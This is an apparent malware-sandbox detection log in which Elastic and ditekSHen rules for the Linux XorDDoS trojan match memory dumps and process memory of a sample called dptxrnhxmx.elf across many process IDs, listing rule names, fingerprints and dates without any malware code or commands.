Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6254.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6388.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6371.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6380.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6248.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6246.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6298.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6383.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: Process Memory Space: dptxrnhxmx.elf PID: 6208, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6210, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6211, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6212, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6243, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6246, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6248, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6251, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6254, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6298, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6301, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6304, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6307, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6309, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6316, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6319, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6322, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6325, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6327, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6337, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6340, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: Process Memory Space: dptxrnhxmx.elf PID: 6343, type: MEMORYSTR	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
